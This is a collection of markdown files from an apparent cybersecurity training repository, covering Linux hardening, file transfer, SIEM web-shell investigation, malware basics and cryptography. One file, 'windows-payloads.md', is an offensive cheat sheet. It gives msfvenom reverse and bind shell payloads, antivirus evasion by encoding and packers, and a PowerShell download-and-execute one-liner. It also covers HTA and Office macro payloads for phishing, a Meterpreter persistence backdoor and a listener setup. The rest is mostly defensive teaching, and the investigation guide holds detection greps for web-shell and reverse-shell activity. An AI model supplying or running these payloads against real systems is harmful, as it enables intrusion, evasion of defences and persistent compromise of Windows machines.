| While `iptables` has been a long-standing tool, its successors like `nftables` are gaining popularity due to improved performance and simplified rule management. `nftables` is built on the same Netfilter framework but offers a unified syntax and better scalability. 91 | 92 | #### Example `nftables` Command: 93 | ```bash 94 | nft add rule ip filter input ip saddr 192.168.0.0/24 drop 95 | ``` 96 | 97 | --- 98 | 99 | ### **Practical Applications** 100 | 101 | - **Firewall Rules**: Secure Linux servers by filtering unwanted traffic. 102 | - **NAT**: Enable internet access for devices on a private network. 103 | - **Traffic Analysis**: Debug and monitor network activity. 104 | - **Intrusion Detection**: Detect and block suspicious packets. 105 | -------------------------------------------------------------------------------- /shell_week/os_hardening_bash.md: -------------------------------------------------------------------------------- 1 | ## 🛡️ Bash Scripting Program for OS Hardening (Beginner to Advanced) 2 | 3 | --- 4 | 5 | ### 📘 Module 1: Introduction to Bash Scripting (Beginner) 6 | 7 | **Topics Covered:** 8 | 9 | * What is Bash? 10 | * Writing and executing your first script 11 | * Variables, conditionals, loops 12 | * Permissions and running scripts safely 13 | 14 | **Practice Scripts:** 15 | 16 | 1. **Hello World Script** 17 | 18 | ```bash 19 | #!/bin/bash 20 | echo "Hello, welcome to OS Hardening!" 21 | ``` 22 | 23 | 2. **User Info Script** 24 | 25 | ```bash 26 | #!/bin/bash 27 | echo "Current User: $(whoami)" 28 | echo "Home Directory: $HOME" 29 | ``` 30 | 31 | 3. **File Permission Checker** 32 | 33 | ```bash 34 | #!/bin/bash 35 | echo "Enter file name:" 36 | read filename 37 | ls -l $filename 38 | ``` 39 | 40 | --- 41 | 42 | ### 📙 Module 2: Intermediate Bash + Basic OS Hardening 43 | 44 | **Topics Covered:** 45 | 46 | * File permissions and ownership 47 | * Password policy enforcement 48 | * User and group management 49 | * Basic auditing 50 | 51 | **Practice Scripts:** 52 | 53 | 1. **Set Strong Password Policy** 54 | 55 | ```bash 56 | #!/bin/bash 57 | echo "Setting strong password policy..." 58 | sed -i 's/^PASS_MAX_DAYS.*/PASS_MAX_DAYS 90/' /etc/login.defs 59 | sed -i 's/^PASS_MIN_DAYS.*/PASS_MIN_DAYS 10/' /etc/login.defs 60 | sed -i 's/^PASS_WARN_AGE.*/PASS_WARN_AGE 7/' /etc/login.defs 61 | echo "Password policy updated." 62 | ``` 63 | 64 | 2. **Disable Unused Users** 65 | 66 | ```bash 67 | #!/bin/bash 68 | echo "Disabling guest account..." 69 | usermod -L guest 70 | echo "Guest account locked." 71 | ``` 72 | 73 | 3. **Audit Critical Files** 74 | 75 | ```bash 76 | #!/bin/bash 77 | files=("/etc/passwd" "/etc/shadow" "/etc/hosts") 78 | for file in "${files[@]}"; do 79 | echo "Checking $file..." 80 | ls -l $file 81 | done 82 | ``` 83 | 84 | --- 85 | 86 | ### 📕 Module 3: Advanced OS Hardening with Bash 87 | 88 | **Topics Covered:** 89 | 90 | * Automating system updates 91 | * Configuring firewall with `ufw` or `iptables` 92 | * Securing SSH 93 | * Disabling dangerous services 94 | 95 | **Practice Scripts:** 96 | 97 | 1. **Secure SSH Configuration** 98 | 99 | ```bash 100 | #!/bin/bash 101 | echo "Securing SSH..." 102 | sed -i 's/^#Port 22/Port 2222/' /etc/ssh/sshd_config 103 | sed -i 's/^#PermitRootLogin.*/PermitRootLogin no/' /etc/ssh/sshd_config 104 | sed -i 's/^#PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config 105 | systemctl restart sshd 106 | echo "SSH secured." 107 | ``` 108 | 109 | 2. **Disable Unnecessary Services** 110 | 111 | ```bash 112 | #!/bin/bash 113 | services=("telnet" "ftp" "rsh" "rlogin") 114 | for s in "${services[@]}"; do 115 | systemctl disable $s 2>/dev/null 116 | systemctl stop $s 2>/dev/null 117 | echo "Disabled $s" 118 | done 119 | ``` 120 | 121 | 3. **Enable and Configure Firewall (UFW)** 122 | 123 | ```bash 124 | #!/bin/bash 125 | echo "Configuring UFW Firewall..." 126 | ufw default deny incoming 127 | ufw default allow outgoing 128 | ufw allow 2222/tcp # SSH on custom port 129 | ufw enable 130 | echo "Firewall enabled and configured." 131 | ``` 132 | 133 | --- 134 | 135 | ### 📗 Module 4: Pro-Level Projects & Automation 136 | 137 | **Topics Covered:** 138 | 139 | * Creating compliance check scripts 140 | * CIS Benchmark checks (basic) 141 | * Log monitoring automation 142 | * Hardened system audit reports 143 | 144 | **Project Ideas:** 145 | 146 | 1. **Automated Security Checklist Script** 147 | 148 | * Check kernel version 149 | * Check for open ports 150 | * Check password aging policy 151 | * Check firewall status 152 | * Output report to a file 153 | 154 | 2. **System Update & Log Cleanup** 155 | 156 | ```bash 157 | #!/bin/bash 158 | echo "Updating system and cleaning logs..." 159 | apt update && apt upgrade -y 160 | journalctl --vacuum-time=7d 161 | echo "System updated and logs cleaned." 162 | ``` 163 | 164 | 3. **Create Weekly Cron Job for Hardening Script** 165 | 166 | ```bash 167 | #!/bin/bash 168 | cp hardening-script.sh /usr/local/bin/ 169 | echo "0 2 * * 0 root /usr/local/bin/hardening-script.sh" > /etc/cron.d/weekly-hardening 170 | echo "Scheduled hardening script." 171 | ``` 172 | 173 | 174 | 175 | 176 | * Sets password policy 177 | * Disables root login 178 | * Updates the system 179 | * Enables firewall 180 | * Scans for open ports 181 | * Creates a security audit report 182 | 183 | -------------------------------------------------------------------------------- /week2/day10_file_transfer.md: -------------------------------------------------------------------------------- 1 | ### **Linux File Transfer in Networking** 2 | 3 | File transfer in Linux involves copying or moving files from one computer to another over a network connection. This functionality is crucial for system administrators and users who need to share data across systems or collaborate in networked environments. 4 | 5 | --- 6 | 7 | ### **Common File Transfer Tools in Linux** 8 | 9 | Linux provides several tools for transferring files over a network. These tools support a range of protocols such as **FTP**, **HTTP**, **SCP**, **SFTP**, and **NFS**. Each protocol and tool is tailored for specific use cases, offering different levels of security, speed, and flexibility. 10 | 11 | --- 12 | 13 | ### **Key File Transfer Commands** 14 | 15 | 1. **`scp` (Secure Copy Protocol)** 16 | A secure method for transferring files between a local and a remote machine or between two remote machines using SSH. 17 | 18 | **Syntax:** 19 | ```bash 20 | scp /path/to/local/file username@remote:/path/to/destination 21 | ``` 22 | **Example:** 23 | ```bash 24 | scp ~/documents/report.txt user@192.168.1.100:/home/user/reports/ 25 | ``` 26 | 27 | 2. **`rsync`** 28 | A powerful tool for file transfer and synchronization, allowing incremental transfers to save bandwidth. 29 | 30 | **Syntax:** 31 | ```bash 32 | rsync -avz /path/to/local/file username@remote:/path/to/destination 33 | ``` 34 | **Example:** 35 | ```bash 36 | rsync -avz ~/projects/ user@192.168.1.100:/home/user/backups/ 37 | ``` 38 | 39 | 3. **`wget`** 40 | A command-line utility for downloading files from web servers using HTTP, HTTPS, or FTP protocols. 41 | 42 | **Syntax:** 43 | ```bash 44 | wget http://example.com/file.tar.gz 45 | ``` 46 | **Example:** 47 | ```bash 48 | wget https://example.com/software.zip 49 | ``` 50 | 51 | 4. **`curl`** 52 | A versatile tool for transferring data to/from a server using various protocols. 53 | 54 | **Syntax:** 55 | ```bash 56 | curl -O http://example.com/file.tar.gz 57 | ``` 58 | **Example:** 59 | ```bash 60 | curl -O https://example.com/document.pdf 61 | ``` 62 | 63 | 5. **`sftp` (Secure File Transfer Protocol)** 64 | A secure method for transferring files via SSH. 65 | 66 | **Interactive Session Example:** 67 | ```bash 68 | sftp username@remote 69 | > put /path/to/local/file /path/to/remote/destination 70 | ``` 71 | 72 | 6. **`ftp`** 73 | A less secure, legacy protocol for file transfers. 74 | 75 | **Example Session:** 76 | ```bash 77 | ftp remote-server.com 78 | > put localfile.txt remotefile.txt 79 | ``` 80 | 81 | --- 82 | 83 | ### **Example: Transferring Files Between Systems** 84 | 85 | - **Local to Remote** 86 | ```bash 87 | scp file.txt user@192.168.1.10:/home/user/ 88 | ``` 89 | 90 | - **Remote to Local** 91 | ```bash 92 | scp user@192.168.1.10:/home/user/file.txt /local/path/ 93 | ``` 94 | 95 | - **Synchronize Directories** 96 | ```bash 97 | rsync -avz /local/directory/ user@192.168.1.10:/remote/directory/ 98 | ``` 99 | 100 | --- 101 | 102 | ### **File Transfer Protocols Overview** 103 | 104 | | **Protocol** | **Description** | **Security** | **Use Case** | 105 | |--------------|------------------------------------------------|--------------------------|--------------------------------------------| 106 | | FTP | File Transfer Protocol (basic and outdated). | No encryption. | Legacy systems, basic transfers. | 107 | | SFTP | Secure FTP using SSH. | Encrypted and secure. | Secure file transfers and uploads. | 108 | | SCP | Secure Copy Protocol (over SSH). | Encrypted and secure. | Simple and secure transfers. | 109 | | Rsync | Synchronization protocol with incremental transfers. | Encrypted (with SSH). | Backups, directory synchronization. | 110 | | HTTP/HTTPS | Web protocols for downloads. | Secure with HTTPS. | File downloads and web-based sharing. | 111 | 112 | --- 113 | 114 | ### **Security Best Practices for File Transfer** 115 | 116 | 1. **Use Secure Protocols:** Prefer `scp`, `rsync`, or `sftp` over FTP to ensure encryption and data security. 117 | 2. **Limit Access:** Restrict file transfer permissions to specific users and directories. 118 | 3. **Verify Transfers:** Use checksums (e.g., `md5sum`, `sha256sum`) to ensure file integrity. 119 | 4. **Automate Transfers:** Use scripts and cron jobs for scheduled or repetitive file transfers. 120 | 121 | By mastering these tools and practices, Linux users can efficiently manage file sharing across networks while ensuring data security and reliability. 122 | -------------------------------------------------------------------------------- /troubleshooting/windows-payloads.md: -------------------------------------------------------------------------------- 1 | For Windows 7 and 8, you can generate multiple **msfvenom** payloads depending on whether you want a **reverse shell**, **bind shell**, or a **staged/stageless Meterpreter** payload. Below are different payloads categorized for your needs. 2 | 3 | --- 4 | 5 | ## **1. Reverse Shell Payloads** 6 | These payloads connect back to your attacker's machine (**LHOST** = your IP). 7 | 8 | ### **Meterpreter Reverse TCP (Staged)** 9 | ``` 10 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > shell.exe 11 | ``` 12 | - **Pros:** Stable, supports post-exploitation modules. 13 | - **Cons:** May be detected by AV. 14 | 15 | ### **Meterpreter Reverse HTTP** 16 | ``` 17 | msfvenom -p windows/meterpreter/reverse_http LHOST= LPORT=8080 -f exe > shell.exe 18 | ``` 19 | - **Pros:** Evades some firewalls using HTTP. 20 | - **Cons:** Slightly slower than TCP. 21 | 22 | ### **Meterpreter Reverse HTTPS** 23 | ``` 24 | msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 -f exe > shell.exe 25 | ``` 26 | - **Pros:** Encrypted communication to evade detection. 27 | - **Cons:** Slightly higher latency. 28 | 29 | ### **Stageless Meterpreter Reverse TCP** 30 | ``` 31 | msfvenom -p windows/meterpreter_reverse_tcp LHOST= LPORT=4444 -f exe > shell.exe 32 | ``` 33 | - **Pros:** Single-stage (faster execution). 34 | - **Cons:** Larger file size. 35 | 36 | --- 37 | 38 | ## **2. Bind Shell Payloads** 39 | These payloads **open a port on the target** machine, and you connect to it. 40 | 41 | ### **Windows Bind Shell (Staged)** 42 | ``` 43 | msfvenom -p windows/shell/bind_tcp LPORT=4444 -f exe > bind.exe 44 | ``` 45 | - **Pros:** No need for an attacker’s IP. 46 | - **Cons:** Might be blocked by firewalls. 47 | 48 | ### **Windows Bind Shell (Stageless)** 49 | ``` 50 | msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe > bind.exe 51 | ``` 52 | - **Pros:** No need for an external IP. 53 | - **Cons:** Less stealthy. 54 | 55 | --- 56 | 57 | ## **3. Powershell Payloads (Fileless)** 58 | These payloads execute **in memory** (useful for bypassing AV). 59 | 60 | ### **Powershell Reverse Shell** 61 | ``` 62 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f psh-cmd > shell.ps1 63 | ``` 64 | To execute on the target: 65 | ``` 66 | powershell -ExecutionPolicy Bypass -File shell.ps1 67 | ``` 68 | 69 | ### **Powershell One-Liner** 70 | ``` 71 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f psh > shell.txt 72 | ``` 73 | Execute it using: 74 | ``` 75 | powershell -ExecutionPolicy Bypass -Command "iex(New-Object Net.WebClient).DownloadString('http:///shell.txt')" 76 | ``` 77 | 78 | --- 79 | 80 | ## **4. Encoded Payloads (Bypassing AV)** 81 | If AV is detecting the payload, try encoding it: 82 | ``` 83 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe 84 | ``` 85 | - **`-e x86/shikata_ga_nai`**: Encodes the payload. 86 | - **`-i 10`**: Increases encoding iterations. 87 | 88 | For further AV evasion, consider using a custom packer (Veil-Evasion, Shellter, or manual obfuscation). 89 | 90 | --- 91 | 92 | ## **5. DLL & HTA Payloads (Alternative Execution)** 93 | ### **DLL Payload** 94 | ``` 95 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f dll > exploit.dll 96 | ``` 97 | Can be injected into a process using `rundll32.exe`. 98 | 99 | ### **HTA (HTML Application) Payload** 100 | ``` 101 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f hta-psh > exploit.hta 102 | ``` 103 | Delivered via phishing or social engineering. 104 | 105 | --- 106 | 107 | ## **6. Macro-Based Payload (For Office Documents)** 108 | ``` 109 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f vba > macro.txt 110 | ``` 111 | Insert the macro into a Microsoft Office document. 112 | 113 | --- 114 | 115 | ## **7. Persistent Backdoor** 116 | To maintain access, use: 117 | ``` 118 | run persistence -U -i 5 -p 4444 -r 119 | ``` 120 | - **`-U`**: Runs at user login. 121 | - **`-i 5`**: Reconnects every 5 seconds. 122 | - **`-p 4444`**: Uses port 4444. 123 | 124 | --- 125 | 126 | ## **8. Listening for Connections (Handler)** 127 | After generating the payload, set up the **Metasploit listener**: 128 | ``` 129 | use exploit/multi/handler 130 | set payload windows/meterpreter/reverse_tcp 131 | set LHOST 132 | set LPORT 4444 133 | set ExitOnSession false 134 | exploit -j 135 | ``` 136 | 137 | --- 138 | 139 | ### **Which One Should You Use?** 140 | - **Windows 7 (no AV):** `windows/meterpreter/reverse_tcp` 141 | - **Windows 7 (with AV):** Encoded payload or `reverse_https` 142 | - **Windows 8 (firewalled):** `reverse_http` or `reverse_https` 143 | - **Stealthy attack:** PowerShell payloads or macro-based payloads 144 | -------------------------------------------------------------------------------- /projects/network_analysis.md: -------------------------------------------------------------------------------- 1 | ### 🚨 **Network Analysis – Web Shell (Local to Local Port Scanning Alert)** 🚨 2 | 3 | This scenario describes a **Local-to-Local Port Scanning** alert in a **Security Information and Event Management (SIEM)** system. It indicates that an internal private IP address is scanning another internal system, which could be a sign of **malware activity, lateral movement, or an attacker using a web shell** inside the network. 4 | 5 | --- 6 | 7 | ## 🕵️‍♂️ **Breaking It Down: What Happened?** 8 | 1️⃣ **SIEM Alert: "Local to Local Port Scanning"** 9 | - The **source IP** (internal private address) is scanning ports on another internal system. 10 | - Normally, internal machines don’t scan each other unless it's for legitimate administrative tasks (e.g., vulnerability scanning by IT teams). 11 | 12 | 2️⃣ **Possible Web Shell Activity** 13 | - A **web shell** is a malicious script that attackers place on a compromised web server. 14 | - The attacker might be using the web shell to execute **commands, scan the network**, and move laterally. 15 | 16 | 3️⃣ **Why is this Suspicious?** 17 | - **Normal users don’t run port scans.** 18 | - A web shell often lets attackers control an internal system **remotely via HTTP/HTTPS**. 19 | - If the system hosting the web shell has been compromised, it could be used to **probe other machines for vulnerabilities**. 20 | 21 | --- 22 | 23 | ## 🔎 **Step 1: Investigate the Alert** 24 | ### 📌 **A. Identify the Source & Destination IPs** 25 | Check **SIEM logs** to find: 26 | - **Source IP** → The internal system initiating the scan. 27 | - **Destination IP** → The system being scanned. 28 | - **Ports Scanned** → Is the scanning targeting specific services (e.g., SSH, RDP, SMB)? 29 | 30 | 👉 Run a **Splunk or Kibana query** to pull logs: 31 | ```spl 32 | index=firewall OR index=network_traffic sourcetype=suricata 33 | | where event=="port_scan" 34 | | table _time, src_ip, dst_ip, dst_port, action 35 | ``` 36 | 👉 If you have Zeek logs, use: 37 | ```spl 38 | index=zeek sourcetype=conn 39 | | where orig_ip==“attacker_internal_IP” 40 | | stats count by resp_ip, resp_port 41 | ``` 42 | 43 | --- 44 | 45 | ### 📌 **B. Check for Web Shell Activity** 46 | 1️⃣ Look for **web server logs** on the suspected machine: 47 | ```bash 48 | sudo cat /var/log/apache2/access.log | grep "cmd=" 49 | sudo cat /var/log/nginx/access.log | grep "wget" 50 | ``` 51 | 2️⃣ Check if any PHP, ASPX, or JSP scripts were uploaded: 52 | ```bash 53 | find /var/www/html -type f -mtime -2 54 | ``` 55 | 3️⃣ Investigate unusual HTTP requests (e.g., `/uploads/shell.php?cmd=id`). 56 | 57 | --- 58 | 59 | ## 🔥 **Step 2: Containment & Mitigation** 60 | ✅ **1. Isolate the Affected Machine** 61 | - Block its network traffic using a firewall rule: 62 | ```bash 63 | sudo iptables -A INPUT -s -j DROP 64 | ``` 65 | - If it’s a Windows machine, remove it from the domain. 66 | 67 | ✅ **2. Search for Known Web Shells** 68 | Run `ClamAV` or `YARA` to detect web shells: 69 | ```bash 70 | clamscan -r /var/www/html 71 | yara -r webshell_rules.yar /var/www/html 72 | ``` 73 | 74 | ✅ **3. Check for Reverse Shell Connections** 75 | If an attacker has a backdoor: 76 | ```bash 77 | sudo netstat -anp | grep ":4444" 78 | ``` 79 | 80 | ✅ **4. Reset Credentials** 81 | - If the attacker gained access through weak credentials, enforce **password resets**. 82 | 83 | --- 84 | 85 | ## 🎯 **Step 3: Implement Detection & Prevention** 86 | ### 🔍 **A. Set Up SIEM Rules for Port Scanning** 87 | - **Rule Logic**: Detect multiple connection attempts from a single internal IP in a short time frame. 88 | - Example in Splunk: 89 | ```spl 90 | index=network sourcetype=suricata 91 | | stats count by src_ip, dst_port 92 | | where count > 10 93 | ``` 94 | - Example in Suricata: 95 | ```yaml 96 | alert ip any any -> any any (msg:"Possible Internal Port Scan"; threshold: type both, track by_src, count 10, seconds 60;) 97 | ``` 98 | - Configure Suricata to drop scanning traffic: 99 | ```yaml 100 | drop ip any any -> any any (msg:"Detected Internal Port Scan";) 101 | ``` 102 | 103 | ### 🔍 **B. Enable Web Shell Detection in WAF** 104 | - If using AWS WAF, add **Web Shell Detection Rules**: 105 | ```json 106 | { 107 | "Statement": { 108 | "ByteMatchStatement": { 109 | "SearchString": "cmd=", 110 | "FieldToMatch": {"QueryString": {}}, 111 | "TextTransformations": [{"Type": "URL_DECODE"}] 112 | } 113 | } 114 | } 115 | ``` 116 | 117 | --- 118 | 119 | ## ✅ **Conclusion** 120 | 🚀 **This case indicates a possible attacker using a web shell to scan the network.** 121 | 🔎 **Your goal as an analyst is to:** 122 | 1. **Identify** the attacker and affected machine. 123 | 2. **Contain** and remove the web shell. 124 | 3. **Investigate** whether they gained access to other systems. 125 | 4. **Harden security** to prevent future attacks. 126 | -------------------------------------------------------------------------------- /week3/day2_report.md: -------------------------------------------------------------------------------- 1 | Linux command-line tasks can range from basic file management to advanced scripting and automation. Below are some essential Linux command-line tasks categorized by functionality. 2 | 3 | --- 4 | 5 | ## **1. File and Directory Management** 6 | ### **Create, List, and Navigate Directories** 7 | | Command | Description | 8 | |---------|------------| 9 | | `ls` | List files in a directory | 10 | | `ls -la` | List all files, including hidden ones, with details | 11 | | `mkdir newdir` | Create a new directory | 12 | | `cd newdir` | Change to the `newdir` directory | 13 | | `pwd` | Show the current working directory | 14 | | `rmdir emptydir` | Remove an empty directory | 15 | 16 | ### **Create, Delete, and Copy Files** 17 | | Command | Description | 18 | |---------|------------| 19 | | `touch file.txt` | Create an empty file | 20 | | `rm file.txt` | Remove a file | 21 | | `rm -rf directory` | Force delete a directory and its contents | 22 | | `cp file1.txt file2.txt` | Copy file1.txt to file2.txt | 23 | | `mv oldname.txt newname.txt` | Rename or move a file | 24 | 25 | --- 26 | 27 | ## **2. File Content Viewing and Editing** 28 | | Command | Description | 29 | |---------|------------| 30 | | `cat file.txt` | View file contents | 31 | | `less file.txt` | View a file page by page | 32 | | `head -n 10 file.txt` | Show the first 10 lines of a file | 33 | | `tail -n 10 file.txt` | Show the last 10 lines of a file | 34 | | `nano file.txt` | Edit a file using Nano | 35 | | `vim file.txt` | Edit a file using Vim | 36 | 37 | --- 38 | 39 | ## **3. File Permissions and Ownership** 40 | | Command | Description | 41 | |---------|------------| 42 | | `ls -l` | View file permissions | 43 | | `chmod 755 script.sh` | Change file permissions (`rwxr-xr-x`) | 44 | | `chown user:group file.txt` | Change file ownership | 45 | | `sudo` | Execute a command as root | 46 | 47 | ### **Understanding Permissions** 48 | - `r` (read), `w` (write), `x` (execute) 49 | - Example: `chmod 644 file.txt` (Owner: `rw-`, Group: `r--`, Others: `r--`) 50 | 51 | --- 52 | 53 | ## **4. Process and Resource Management** 54 | | Command | Description | 55 | |---------|------------| 56 | | `ps aux` | Show running processes | 57 | | `top` | Display system resource usage | 58 | | `kill PID` | Kill a process by its PID | 59 | | `pkill processname` | Kill a process by name | 60 | | `htop` | Interactive process viewer (if installed) | 61 | 62 | --- 63 | 64 | ## **5. User Management** 65 | | Command | Description | 66 | |---------|------------| 67 | | `whoami` | Show current user | 68 | | `id` | Display user ID and group ID | 69 | | `adduser newuser` | Add a new user | 70 | | `passwd newuser` | Change a user's password | 71 | | `usermod -aG sudo newuser` | Grant sudo privileges | 72 | 73 | --- 74 | 75 | ## **6. Networking** 76 | | Command | Description | 77 | |---------|------------| 78 | | `ping google.com` | Check internet connectivity | 79 | | `ifconfig` or `ip a` | Show network interfaces | 80 | | `curl example.com` | Fetch content from a URL | 81 | | `wget file_url` | Download a file | 82 | | `netstat -tulnp` | Show open ports | 83 | 84 | --- 85 | 86 | ## **7. Disk Management** 87 | | Command | Description | 88 | |---------|------------| 89 | | `df -h` | Show disk usage | 90 | | `du -sh folder/` | Show folder size | 91 | | `mount /dev/sdb1 /mnt` | Mount a disk | 92 | | `umount /mnt` | Unmount a disk | 93 | 94 | --- 95 | 96 | ## **8. Searching and Finding Files** 97 | | Command | Description | 98 | |---------|------------| 99 | | `find / -name "file.txt"` | Search for a file by name | 100 | | `grep "error" logfile.txt` | Search for "error" in a file | 101 | | `grep -r "keyword" /var/log/` | Search recursively in a directory | 102 | 103 | --- 104 | 105 | ## **9. Archiving and Compression** 106 | | Command | Description | 107 | |---------|------------| 108 | | `tar -cvf archive.tar folder/` | Create a tar archive | 109 | | `tar -xvf archive.tar` | Extract a tar archive | 110 | | `zip -r archive.zip folder/` | Create a zip file | 111 | | `unzip archive.zip` | Extract a zip file | 112 | 113 | --- 114 | 115 | ## **10. Scripting and Automation** 116 | ### **Basic Shell Script** 117 | Create a simple script (`myscript.sh`): 118 | ```bash 119 | #!/bin/bash 120 | echo "Hello, Linux!" 121 | date 122 | ``` 123 | Make it executable: 124 | ```bash 125 | chmod +x myscript.sh 126 | ./myscript.sh 127 | ``` 128 | 129 | --- 130 | 131 | ## **11. System Information** 132 | | Command | Description | 133 | |---------|------------| 134 | | `uname -a` | Show kernel information | 135 | | `uptime` | Display system uptime | 136 | | `free -m` | Show memory usage | 137 | | `df -h` | Show disk usage | 138 | 139 | --- 140 | 141 | ### **Bonus: One-Liner Productivity Commands** 142 | 1. **Find and delete files larger than 100MB:** 143 | ```bash 144 | find /path/to/dir -size +100M -delete 145 | ``` 146 | 2. **Monitor a log file in real-time:** 147 | ```bash 148 | tail -f /var/log/syslog 149 | ``` 150 | 3. **Find top 10 largest files:** 151 | ```bash 152 | du -ah / | sort -rh | head -n 10 153 | ``` 154 | 155 | --- 156 | -------------------------------------------------------------------------------- /projects/malware.md: -------------------------------------------------------------------------------- 1 | **Module 1: Introduction to Malware** for your course. 2 | 3 | --- 4 | 5 | # 🏗 **Module 1: Introduction to Malware** 6 | 7 | ## 🎯 **Learning Objectives:** 8 | By the end of this module, students will: 9 | ✅ Understand different **types of malware** and how they work. 10 | ✅ Learn about **attack vectors** used to deliver malware. 11 | ✅ Analyze **real-world malware cases** like WannaCry, Stuxnet, and Pegasus. 12 | ✅ Perform **basic malware analysis** using public repositories. 13 | 14 | --- 15 | 16 | ## 📌 **1.1 What is Malware?** 17 | 🔹 **Definition**: Malware (Malicious Software) is a program designed to disrupt, damage, or gain unauthorized access to a computer system. 18 | 🔹 **Goals of Malware**: 19 | - **Steal Data** (Banking Trojans, Keyloggers) 20 | - **Cause Disruptions** (Worms, Ransomware) 21 | - **Gain Unauthorized Access** (Rootkits, RATs) 22 | - **Spy on Users** (Spyware, Pegasus) 23 | 24 | --- 25 | 26 | ## 📌 **1.2 Types of Malware** 27 | 28 | | Malware Type | Description | Real-World Example | 29 | |--------------|------------|--------------------| 30 | | **Trojan** | Disguised as legitimate software but executes malicious code. | Zeus Trojan (Banking malware) | 31 | | **Worm** | Self-replicates and spreads across networks. | WannaCry (Exploited SMBv1 vulnerability) | 32 | | **Ransomware** | Encrypts user files and demands payment. | Locky, REvil, WannaCry | 33 | | **Keylogger** | Records keystrokes to steal credentials. | Hawkeye Keylogger | 34 | | **Rootkit** | Hides malware presence from OS and security tools. | Stuxnet (Kernel-mode rootkit) | 35 | | **Spyware** | Secretly gathers user information. | Pegasus (Spyware used by governments) | 36 | | **Adware** | Unwanted ads, redirects users to malicious sites. | Fireball Adware | 37 | 38 | --- 39 | 40 | ## 📌 **1.3 Common Attack Vectors** 41 | 42 | Malware is delivered through different methods, including: 43 | 44 | ### 📨 **Phishing Attacks** 45 | 🔹 Fake emails with malicious attachments or links. 46 | 🔹 Example: **Emotet malware** spreads through phishing emails. 47 | 48 | ### 💻 **Exploits & Vulnerabilities** 49 | 🔹 Attackers exploit software flaws (**Zero-days, RCEs, Buffer Overflows**). 50 | 🔹 Example: **EternalBlue exploit** used by WannaCry. 51 | 52 | ### 🌐 **Drive-by Downloads** 53 | 🔹 Malicious scripts automatically download malware when a user visits an infected website. 54 | 🔹 Example: **Angler Exploit Kit** used to spread ransomware. 55 | 56 | ### 👥 **Social Engineering** 57 | 🔹 Tricking users into **installing malware** (e.g., Fake software updates). 58 | 🔹 Example: **Tech support scams** convincing users to download RATs. 59 | 60 | --- 61 | 62 | ## 📌 **1.4 Malware in the Real World: Case Studies** 63 | 64 | ### 🦠 **Case Study 1: WannaCry Ransomware (2017)** 65 | 🔹 Exploited **EternalBlue SMBv1 vulnerability**. 66 | 🔹 **Infected 230,000+ computers** in over 150 countries. 67 | 🔹 **Ransom demand**: $300–$600 in Bitcoin. 68 | 🔹 **Mitigation**: **Patch SMBv1 (MS17-010)** and disable unnecessary services. 69 | 70 | ### 🏭 **Case Study 2: Stuxnet Worm (2010)** 71 | 🔹 First-ever **cyber weapon** targeting **Iran’s nuclear program**. 72 | 🔹 Spread via **USB drives** and infected **SCADA systems**. 73 | 🔹 Used **Zero-day exploits** and **rootkit techniques**. 74 | 🔹 **Impact**: Damaged **centrifuges** in Natanz, Iran. 75 | 76 | ### 📱 **Case Study 3: Pegasus Spyware** 77 | 🔹 Developed by **NSO Group** for **government surveillance**. 78 | 🔹 Exploits **zero-click vulnerabilities** in WhatsApp and iMessage. 79 | 🔹 Can **record calls, steal messages, track GPS, and control the camera**. 80 | 🔹 Found in **journalists' and activists' phones** worldwide. 81 | 82 | --- 83 | 84 | ## 🛠 **Hands-on Lab: Basic Malware Report Analysis** 85 | 86 | ### 🎯 **Objective:** 87 | Students will analyze **real-world malware samples** from online repositories. 88 | 89 | ### **Step 1: Open Public Malware Repositories** 90 | ✅ [VirusTotal](https://www.virustotal.com/) - Check malware hashes and scans. 91 | ✅ [Hybrid Analysis](https://www.hybrid-analysis.com/) - Detailed behavior analysis. 92 | ✅ [ANY.RUN](https://any.run/) - Interactive malware sandbox. 93 | 94 | ### **Step 2: Analyze a Known Malware Sample** 95 | 1️⃣ Search for "**WannaCry sample hash**" in VirusTotal. 96 | 2️⃣ View **static analysis** (PE file info, signatures, YARA matches). 97 | 3️⃣ Check **dynamic behavior** (API calls, network requests). 98 | 99 | ### **Step 3: Identify Indicators of Compromise (IoCs)** 100 | 🔍 Hashes (SHA256, MD5) 101 | 🔍 IP Addresses & Domains used by malware 102 | 🔍 File system modifications 103 | 104 | --- 105 | 106 | ## ✅ **Key Takeaways** 107 | ✔ **Malware types and attack methods** are diverse. 108 | ✔ **Case studies** show how malware evolves over time. 109 | ✔ **Hands-on analysis** helps understand malware behavior. 110 | 111 | --- 112 | 113 | ### 📌 **Next Module: Setting Up a Safe Malware Lab** 114 | 🔹 Install **REMnux, FLARE-VM, and Cuckoo Sandbox**. 115 | 🔹 Configure a **safe, isolated VM** for testing malware. 116 | -------------------------------------------------------------------------------- /week1/cryptgraphic.md: -------------------------------------------------------------------------------- 1 | ### **Week 5: Cryptography Basics - Explanation and Activities** 2 | 3 | Cryptography is an essential part of cybersecurity, used to secure communication, protect sensitive data, and ensure authenticity. Let's break down the core topics and activities for this week. 4 | 5 | --- 6 | 7 | ## **🔹 Topics:** 8 | 9 | ### **1️⃣ What is Cryptography?** 10 | Cryptography is the science of securing information by transforming it into an unreadable format. It ensures **confidentiality, integrity, authentication,** and **non-repudiation** of data. 11 | 12 | 🔹 **Key Objectives of Cryptography:** 13 | - **Confidentiality:** Keeps data private (e.g., encrypted messages). 14 | - **Integrity:** Ensures data is not tampered with (e.g., hashing). 15 | - **Authentication:** Confirms the sender's identity (e.g., digital signatures). 16 | - **Non-repudiation:** Prevents denial of actions (e.g., signed emails). 17 | 18 | --- 19 | 20 | ### **2️⃣ Types of Cryptography: Symmetric vs. Asymmetric** 21 | Cryptography is classified into **symmetric** and **asymmetric** encryption based on how keys are used. 22 | 23 | #### **🔸 Symmetric Encryption (Secret-Key Encryption)** 24 | - Uses **one single key** for encryption and decryption. 25 | - Fast but requires securely sharing the key. 26 | - Example: **AES (Advanced Encryption Standard).** 27 | 